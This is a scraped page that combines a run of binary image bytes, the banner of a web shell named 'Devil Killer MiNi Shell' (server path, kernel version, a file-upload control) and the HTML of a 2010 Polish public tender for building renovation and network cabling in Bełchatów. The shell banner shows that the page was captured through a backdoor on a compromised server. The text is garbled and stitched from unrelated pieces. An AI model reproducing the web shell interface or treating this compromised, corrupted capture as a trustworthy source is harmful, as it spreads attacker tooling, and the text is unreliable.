JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100720/192915-N-2010.html

<p class="kh_header"><b>Bełchatów: Zadanie 1. Przebudowa pomieszczeń wraz z wykonaniem okablowania strukturalnego  z dedykowaną instalacją elektryczną dla Zespołu          ds. orzekania o niepełnosprawności w budynku Bursy Szkolnej                 w Bełchatowie;
Zadanie 2. Remont pomieszczeń piwnic - szatni w II Liceum Ogólnokształcącym w Bełchatowie.</b><br>
<b>Numer ogłoszenia: 192915 - 2010; data zamieszczenia: 20.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Bełchatowie , ul. Pabianicka 17/19, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358600, faks 044 6358617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-belchatowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1. Przebudowa pomieszczeń wraz z wykonaniem okablowania strukturalnego  z dedykowaną instalacją elektryczną dla Zespołu          ds. orzekania o niepełnosprawności w budynku Bursy Szkolnej                 w Bełchatowie;
Zadanie 2. Remont pomieszczeń piwnic - szatni w II Liceum Ogólnokształcącym w Bełchatowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia 


3.1.   Zadanie 1. Przebudowa pomieszczeń wraz z wykonaniem okablowania strukturalnego         z dedykowaną instalacją elektryczną dla Zespołu ds. orzekania o niepełnosprawności                     w budynku Bursy Szkolnej w Bełchatowie

3.1.1. Branża budowlana:

Przedmiotem zamówienia jest zmiana sposobu użytkowania, polegająca na adaptacji pomieszczeń budynku Bursy szkolnej na Zakład ds. orzekania o niepełnosprawności. Istniejące pomieszczenia zostaną przystosowane dla potrzeb osób niepełnosprawnych. Zaprojektowano następujące pomieszczenia: pomieszczenie 23 zaprojektowano na pomieszczenie serwerowni, pomieszczenie 8 przedzielono ściankami gipsowo-kartonowymi, tworząc nowe pomieszczenie 8a. 
Roboty rozbiórkowe i demontażowe:
Roboty polegające na rozkuciu istniejących otworów drzwiowych i dopasowaniu ich na potrzeby zainstalowania drzwi antywłamaniowych typu C. Przebudowa pokoju 23 na pomieszczenie serwerowni obejmuje roboty polegające na usunięciu płytek ceramicznych ze ścian oraz terakoty         z podłogi. Dodatkowo należy zdemontować umywalkę, sedes. W pomieszczeniu 8a należy zdemontować płytki lastryko. W obu pomieszczeniach należy usunąć istniejący podkład betonowy znajdujący się na płycie stropowej. 
Roboty montażowe: 
Zaprojektowano przegrodę, dzielącą pomieszczenie 8, z płyt gipsowo-kartonowych na stelażu stalowym o grubości całkowitej 100mm. Grubość płyt przyjęto 12,5mm. Pomiędzy płytami umieszczono płytę z wełny mineralnej grubości 8cm. W przegrodzie zamontowano 4 drzwi                   o szerokości skrzydła 80cm. Pozostałe drzwi należy wymienić na nowe drzwi antywłamaniowe typu C, o szerokości skrzydeł 90cm. Przyjęto ościeżnice stalowe wmurowane do ścian z cegły,              w przypadku płyt gipsowo-kartonowych przyjęto profile ościeżnicowe. Otwory drzwiowe są przystosowane do zamontowania systemowej ościeżnicy antywłamaniowej. We wszystkich pomieszczeniach należy wykonać wylewkę cementową grubości 30mm a na niej wylewkę samopoziomującą grubości 20mm. W pomieszczeniu 23 należy zamontować wykładzinę firmy Armstrong - DLW typ Strong 951 lub równoważną, w pomieszczeniu 8a przeznaczonym na brudownik oraz we wszystkich pozostałych pomieszczeniach objętych opracowaniem należy zamontować wykładzinę firmy Armstrong - Favorite Pur lub równoważną. Wykładziny należy zamontować zgodnie z zaleceniami producentów. 
Roboty okładzinowe: 
W pokoju 8 i 23 należy otynkować wszystkie powierzchnie ścian i sufit. Dodatkowo powierzchnie wokół drzwi antywłamaniowych otynkować zaprawą cementowo-wapienną. Wszystkie otynkowane powierzchnie należy pomalować farbą emulsyjną. 

3.1.2. Branża elektryczna:

Przedmiotem zamówienia  jest wykonanie instalacji elektrycznych w przebudowywanej części budynku. Zakres zamówienia obejmuje:
rozdzielnica TK,
instalacja gniazd wtyczkowych,
instalacja okablowania strukturalnego,
instalacja połączeń wyrównawczych,
ochrona od porażeń prądem elektrycznym.

Zasilanie budynku i bilans mocy:
Obecnie budynek posiada układ pomiarowy. Projektowana rozdzielnica TK będzie zasilana                    z istniejącej rozdzielnicy TO, która znajduje się w jednej obudowie z rozdzielnicą główną TG.                W rozdz. TG znajduje się główny wyłącznik przeciwpożarowy budynku. W celu zasilenia rozdzielnicy TK należy dobudować jedno pole w istniejącej obudowie - zamontować rozłącznik bezpiecznikowy z wkładką 25A. Z tego pola należy poprowadzić kabel YKYżo 5x6mm2 do tablicy TK. Bilans mocy: moc zainstalowana PS = 5,7 kW; współczynnik jednoczesności kj = 0,8; moc szczytowa Pmax = 4,5 kW; prąd obliczeniowy IO = 7 A;prąd zabezpieczenia w TO IB = 25A
Obecna moc przyłączeniowa budynku w pełni pokryje zapotrzebowanie mocy na obwody projektowane.

Instalacja gniazd wtykowych:
Obwody gniazd wtykowych wykonać przewodem typu YDYp lub YDY o przekroju 3x2,5 mm2 750V. Instalacje układać w listwach PCV. Należy przewidzieć rezerwę w listwach w głównych ciągach dla instalacji alarmowej, która będzie zamontowana na obiekcie w przyszłości.
W pomieszczeniach montować na wysokości 30 cm od posadzki w ramkach wielokrotnych, razem z gniazdami RJ45. Gniazda montować natynkowo, w kanałach. Gniazda należy montować                     w miejscach wskazanych na rzucie lub po uzgodnieniu z Inwestorem na etapie wykonawstwa.
Należy skrupulatnie przestrzegać kolorystycznego oznakowania żył przewodowych i kabli (również w obrębie rozdzielnicy). Przewód zerowy (N) musi posiadać izolację koloru jasnoniebieskiego,          a przewód ochronny (PE) -żółto-zielonego. W żadnym miejscu instalacji odbiorczej przewód zerowy (N) i przewód ochronny (PE) nie mogą być połączone. Wszystkie urządzenia i sprzęt elektryczny, których konstrukcja wykonana jest z metalu lub zawierają one elementy metalowe, na których w przypadku uszkodzenia może pojawić się napięcie, muszą być obowiązkowo przyłączone do przewodu ochronnego. Dla przewodów i kabli przeznaczonych do ułożenia należy stosować trasy pionowe i poziome. W myśl tego doprowadzenie przewodów do opraw oświetleniowych na stropie należy wykonać pod kątem prostym. Skośnie przeprowadzone kable, przewody i puste rury nie zostaną odebrane jako prawidłowo wykonane. Wszystkie przejścia przez ściany i stropy oddzieleń pożarowych (oddzielne strefy pożarowe) należy uszczelnić niepalną pianką o odporności ogniowej równej odporności tego oddzielenia. Wszystkie wykorzystywane urządzenia i materiały muszą posiadać fabryczne oznaczenia. Urządzenia i materiały będą w pełni zgodne z polskimi normami.
W miejscu wspólnego prowadzenia przewodów z instalacją słaboprądową należy zastosować separację w postaci przegrody koryta kablowego. Minimalna odległość między kablami informatycznymi i lampami fluoroscencyjnymi, neonowymi i próżniowo-łukowymi (lub innymi            o wysokim poziomie prądu rozładowania) powinna wynosić minimum 300 mm.Trasa instalacji powinna przebiegać bezkolizyjnie z innymi instalacjami i urządzeniami, trasa powinna być
przejrzysta, prosta i dostępna dla prawidłowej konserwacji oraz przyszłej rozbudowy. Kanały kablowe DLP 65x150 z przegrodą i dwoma pokrywami 65 posiadają minimum 30% rezerwy miejsca na ewentualną rozbudowę sieci.

Instalacja sieci strukturalnej:
System okablowania strukturalnego ma zapewnić warstwę fizyczną dla przesyłu wszystkich aplikacji zaprojektowanych dla okablowania klasy E (kategorii 6) według najnowszych standardów PN-EN 50173, ISO IEC11801, ANSI TIA EIA 568-B.2. Dla zapewnienia elastyczności, system musi umożliwiać swobodną rozbudowę, oraz rekonfigurację. Wszystkie komponenty systemu okablowania muszą spełniać wymagania co najmniej kategorii 6 w celu uzyskania odpowiednio dużych marginesów bezpieczeństwa parametrów transmisyjnych. Projektowane okablowanie poziome obsługiwane jest przez następujący punkt dystrybucyjny GPD obsługujący łączność pomiędzy punktami końcowymi. Szafa 42U 1000x800 w pomieszczeniu nr 23, w której zbiegać się będą linie transmisyjne. Maksymalna długość kabla instalacyjnego (tzw. łącza stałego) nie może przekroczyć 90 metrów. Środowisko, w którym będzie instalowany osprzęt kablowy zostało sklasyfikowane jako M1I1C1E1 (łagodne) wg. specyfikacji środowiska instalacji okablowania (MICE) - zgodnie z PN-EN 50173-1:2009.

Budowa punktu logicznego:
Punkty logiczne PL dla systemu sieci strukturalnej oparte zostały na uniwersalnym ekranowanym gnieździe teleinformatycznym kategorii 6, montowanym w uchwycie do osprzętu 45mm. Zestaw instalacyjny powinien zawierać płytę czołową prostą z ramką montażową 45mm. W fazie projektowej (uruchomienia instalacji) należy skonfigurować gniazda końcowe tak, aby spełniały
obecne wymagania kategorii 6/klasy E. W każdym przypadku doprowadzając kabel do gniazda należy pozostawić odpowiedni zapas kabla instalacyjnego. Podczas montażu gniazda RJ45 należy bezwzględnie pamiętać o oznakowaniu gniazd zgodnym z oznaczeniem kabla oraz gniazdem               w panelu krosowym punktu dystrybucyjnego.

Instalacja oświetlenia:
Należy stosować oprawy wyposażone w źródła światła jarzeniowe. Przy doborze opraw oświetlenia wewnętrznego stosować normę PN-EN 12464-1.

3.2.  Zadanie 2.  Remont pomieszczeń piwnic - szatni w II Liceum Ogólnokształcącym                  w Bełchatowie.

Zakres zamówienia obejmuje:
1. Roboty rozbiórkowe:
demontaż istniejących boksów w szatni,
rozebranie posadzki lastrico,
2. Prace posadzkarskie:
po rozebraniu istniejącej posadzki lastrico, oczyszczenie i odkurzenie powierzchni,
ułożenie izolacji z emulsji typu Dysperbit w dwóch warstwach, następnie ułożenie folii izolacyjnej gr.0,2mm,
wykonanie posadzki cementowej gr.4cm zbrojonej siatką stalową z drutu śr.4mm i oczkach 15x15cm, wykonanie dylatacji zgodnie z dylatacjami w odsłoniętym podłożu po skuciu lastrica,
gruntowanie posadzek, ułożenie płytek podłogowych gresowych (kolor do uzgodnienia             z inwestorem), dylatacje wykonać z systemowych listew do płytek podłogowych,
ułożenie cokoliku o wys. 10cm.
3. Roboty wykończeniowe:
zeskrobanie i zmycie ścian i sufitów z wyługowaniem farby olejnej na lamperii,
przygotowanie podłoża i wykonanie 1-warstwowej gładzi gipsowej na ścianach i suficie,
sufit i ściany powyżej tynku mozaikowego należy pomalować farbą emulsyjną                          po uprzednim wykonaniu 1-warstwowej gładzi gipsowej,
wykonanie lamperii na wysokość 200 cm z tynku mozaikowego, żywicznego (kolor                  do uzgodnienia z Inwestorem)
przejścia poniżej 2,0m oznakować pasami czarno-żółtymi.
4. Zabudowa rur kanalizacyjnych i zaworów c.o.:
istniejące rury kanalizacyjne obudować płytą g-k wodoodporną gr.12,5mm (pionowo), od spodu natomiast wykonać zabudowę typu Amstrong, która umożliwi dostęp do rur,
istniejące zawory c.o. na filarach międzyokiennych obudować płytą g-k wodoodporną gr.12,5mm, obsadzić drzwiczki metalowe 50x50cm wyposażone w zamek.
5. Malowanie rur instalacji c.o.:
istniejące rury instalacji c.o. należy oczyścić i pomalować 2-krotnie farbą olejną.
6. Stolarka drzwiowa:
wykonać montaż drzwi 2-skrzydłowych z ościeżnicą metalową. Kolorystykę stolarki należy
dobrać w uzgodnieniu z Inwestorem.
7. Montaż nawiewników okiennych:
w istniejącej stolarce okiennej PCV zamontować nawiewniki higrosterowane typu AERECO EMM 707..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.40.00.00-1, 45.45.30.00-7, 45.31.73.00-5, 32.42.00.00-3, 32.42.30.00-4, 45.31.43.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww.warunek zostanie spelniony jezeli wykonawca przedłozy oświadczenie z art.44 p.z.p (załacznik nr 2 do SIWZ)Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt 6.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie spełniony jeżeli wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (załącznik nr 2 do SIWZ).Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie spełniony jeżeli wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (załącznik nr 2 do SIWZ)  Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt 6.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie spełniony jeżeli wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (załącznik nr 2 do SIWZ)  oraz oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia (załącznik nr 4 do SIWZ). Warunek w zakresie uprawnień zostanie uznany za spełniony jeżeli wykonawca oświadczy, że co najmniej jedna osoba, która będzie uczestniczyć w wykonaniu zamówienia posiada uprawnienia budowlane                           do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej - w przypadku Zadania 1  i Zadania 2 oraz w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych -  w przypadku Zadania 1, bez ograniczeń lub                      w ograniczonym zakresie i posiada zaświadczenie o wpisie do właściwej izby samorządu zawodowego.Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt 6.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ww. warunek zostanie spełniony jeżeli wykonawca  przedłoży oświadczenie z art. 44 P.z.p. (załącznik nr 2 do SIWZ). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca spełnia lub nie spełnia poszczególnych warunków na podstawie przedłożonych wraz z ofertą dokumentów, o których mowa w pkt 6.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.formularz ofertowy -  z wykorzystaniem wzoru określonego w załączniku nr 1 do SIWZ,
2.druk wykazu części zamówienia, które Wykonawca zamierza zlecić podwykonawcom         - z wykorzystaniem wzoru stanowiącego załącznik  nr 6 do SIWZ (jeżeli dotyczy),
3.kosztorys ofertowy opracowany metodą kalkulacji szczegółowej zgodnie                              z rozporządzeniem Ministra  Rozwoju Regionalnego i Budownictwa z dnia 13 lipca 2001 roku  w sprawie metod kosztorysowania obiektów i robót budowlanych                   (Dz. U. z 2001 r. Nr 80 poz. 867).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p> Zmiana istotnych postanowień zawartej Umowy po jej zawarciu w stosunku do treści oferty złożonej przez Wykonawcę jest dopuszczalna przy zachowaniu następujących warunków:
1)przedmiotu zamówienia, pod warunkiem, że będą one na korzyść Zamawiającego albo zaszły okoliczności których nie można było przewidzieć w chwili zawarcia Umowy, 
2)terminu wykonania umowy,  pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarci umowy, w szczególności:
a) w następstwie wykraczających poza terminy określone w Kodeksie Postępowania Administracyjnego procedur administracyjnych oraz innych terminów formalno - prawnych mających wpływ na terminy realizacji zamówienia,
b) działania siły wyższej.
3)wynagrodzenia umownego pod warunkiem, że zmiany te są korzystne dla                        Zamawiającego lub zmiany te będą spowodowane zmniejszeniem zakresu przedmiotu zamówienia,
4)Zamawiający  postanowił zmienić zakres realizowanego zamówienia bądź inne postanowienia Umowy ze względu na nowe okoliczności, o których nie wiedział zawierając Umowę .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
